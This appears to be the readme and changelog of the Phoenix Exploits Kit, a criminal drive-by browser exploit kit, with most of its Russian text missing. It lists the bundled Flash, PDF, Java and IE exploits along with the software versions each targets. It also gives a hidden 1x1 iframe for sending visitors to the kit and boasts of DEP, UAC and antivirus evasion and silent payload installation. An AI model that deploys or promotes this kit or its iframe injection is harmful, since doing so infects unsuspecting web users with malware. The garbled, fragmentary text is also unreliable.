
======================================================================== ==============================================================================

Phoenix Exploits Kit  "PEK"       ,  :

MDAC, 
FLASH 9, FLASH 10,
PDF COLLAB, PDF PRINTF, PDF LIBTIFF,
JAVA TC, JAVA RMI, JAVA MIDI, JAVA SKYLINE,
IEPEERS, HCP

     2.5             .


=====================================================================  ==========================================================================

1)       try{}catch{}          ,      .
                  (MDAC, FLASH9, SNAPSHOT, PDF)      
       FLASH10, JAVA MIDI  ..

2)                 .

3)   Flash . 
     SWF   ... JavaScript!
              ! :)

========================================================================= ==============================================================================

      PDF         11     PDF  PEK    
    (style=display:none;).
  : <iframe src="http://domain.com/phx/index.php" width="1" height="1" frameborder="0"></iframe>


========================================================================  ==========================================================================

-----------v2.5------------------------------------

[+] 2 JAVA  JAVA RMI  JAVA MIDI      JRE   JAVA TC   
        /    .      JAVA: TC/RMI/MIDI.

[+]   JAVA SKYLINE  JRE 1.6.0_19-1.6.0_21   Internet Explorer  Windows XP/Vista/Windows 7.

[+]  

[+]       *

(*)    v2.5 full,   2.5 light       .


-----------v2.4------------------------------------

[+]   JAVA TC       JAVA DESERIALIZE  JAVA GSB .
       JRE/JDK  1.5.0-1.5.0_23  1.6.0-1.6.0_18  Win XP/VISTA/7.

[+]  QUICKTIME   QUICKTIME PLAYER v. 7.6.6-7.6.7  Win XP  IE 6/7/8.

[+]  PDF FONT   ADOBE READER 9.3.1-9.3.4  Win XP/VISTA/7.

[+]  .            .
           .

[+]   JAVA  -        /IP.
         ,     ,   IP     . 

-----------v2.3------------------------------------

[+]  PDF LIBTIFF      ASLR+DEP   Adobe Reader 8.0-9.3.0     Windows VISTA  WINDOWS7.

-----------v2.21-----------------------------------

[+]HCP      IE8     Real Player
   (       Windows Media Player >= 10)

[+]  HCP     (FireFox, Safari, Chrome, etc.)
   (   Windows Media Player <10  Real Player)

[+]    ,    

[+]    FireFox

[*]     l.php, 
             PHP.

-----------v2.2------------------------------------

[+] HCP   Win XP all SP IE 7/8.

[+] JAVA SMB 

[+] PDFSWF   Adobe Reader 9.3.1-9.3.2  Win XP SP3

[+] PDFOPEN -  Adobe Reader 9.x

[+]  PDF     (FireFox, Opera, Safari, etc.)

[+]   , WIN7       

-----------v2.1------------------------------------

[+] PDF NEWPLAYER  PDF ALL            FireFox

[+]       

-----------v2.0------------------------------------

[+]  PDFLIBTIFF (CVE2010-0188)  Acrobat Reader 9.0-9.3     DEP   JavaScript  Adobe Reader  Windows XP.
         PDFNEWPLAYER  PDFGETICON            
      -PDFLIBTIFF         .

[+]    IEPEERS  IE6/IE7              
      ,                - 
      , ,    6 ,   !                
      ,           .
       Windows XP SP2/SP3/Windows Vista    UAC!

[+]    JAVA GSB  JAVA DESERIALIZE  (         jre  !).
             jre (1.5.0-1.5.0-21),        .

[*]       - JAVA DESERIALIZE  GSB            .
        Windows Vista  PDF Geticon           DEP.
                  UAC,         DEP    
        DEP.        Windows Vista  .  Windows.

[+]Phoenix Tripple System -    6  PDF  JS         
       .
         - . 
    -    .
          Web-       Web Money.       
        30                    .
                 ICQ  Jabber           
                 .     30       
          icq/jabber          "".
                      .

[*] IE SNAPSHOT        .

-----------v1.4------------------------------------

[+] Java Deserialize   JRE 1.6.0-1.6.0_10     Windows Vista  Windows 7    UAC.
         Windows 7,      !

[+]            black-.

[+]      Windows 7   Google Chrome.


-----------v1.31-----------------------------------

[*]     Adobe Reader 9.3  8.2     PDF NEWPLAYER     .
                .

[+]   .exe     

[+]  activate.php     ,           .

-----------v1.3-----------------------------------

[+]   JAVA GSB (CVE 2009-3867)           JRE/JDK 1.6.0 - 1.6.0_16.

[+]  PDF       (730 ),         PDF    .
          PDF ,       .

[*]       (AOL IWINAMP, DSHOW, FF EMBED, IE7 MEMORY CORRUPTION)
              .

-----------v1.2-----------------------------------

[+]       new player();  Acrobat Reader 8-9.2      .

[+]  .exe  .

[+]     (  index.php?n=X)
           X.

[+]  JS   KAV8,       0/41  virustotal.com.       .


-----------v1.1-----------------------------------

[+]  PDF            .

[+]   PDF         11 . 
    Javascript Document Level       PDF .
    -   ,  Acrobat Reader  .

[+]   PDF    .
                  collab 8   .
      printf                 .
          - 6-7  collab, 8-9  geticon,  7.1.0 - printf.
     PDF        (   Adobe Reader 9.0)

[-]   PDF plug-in  FireFox    . 
     -        Acrobat Reader 6/7.

[+]  JS    ,      .
              ~ 1,5-2  (    ).
          -         -       tmp.
           recrypt.php.

-----------v1.0-----------------------------------

[-]    JAVA PACK200 .

[-]          AOL IWINAMP, DIRECTSHOW, MS09-002  IE7 XML PARSING.

[-]   Adobe Acrobat Reader  Internet Explorer.

[-]      Internet Explorer.

[-]        MS09-002     .

[+]  Javascript      Callee.

[+]  heap spraying' FLASH10        9.0.124, 9.0.151, 9.0.159 Flash Player'a   Windows XP SP3.

[+]   FLASH .  FLASH       SWF       Javascript.

[+]     Flash Player  9.0.124, 9.0.151, 9.0.159, 10.12.36  10.0.22.87      Windows VISTA.

[+] FIREFOX EMBED . 

[+]  FLASH    FireFox.

[+]  PDF (beta)         .

-----------v1.0beta---------------------------------

   (-)

================================================================    ======================================================================

1)            (  index.php?n=X)   exeX.exe. 

2)   : 
  -Standard (  ), 
  -Silent (          MDAC, SNAPSHOT, FLASH9, JAVA GSB    JRE/SDK, PDF  Adobe Reader 6.0-8.1.2)
  -Super Silent (          - MDAC, SNAPSHOT, FLASH9, PDF  Adobe Reader 8.0-8.1.2)

3) Lite     JavaScript    Standard, Silent  Super Silent        .

4)          .
                      .
                     .

5)   PDF        JavaScript    PDF .
  (             )

6)   FLASH10    SWF        .
  (    ,   )

7)    -   "" ;)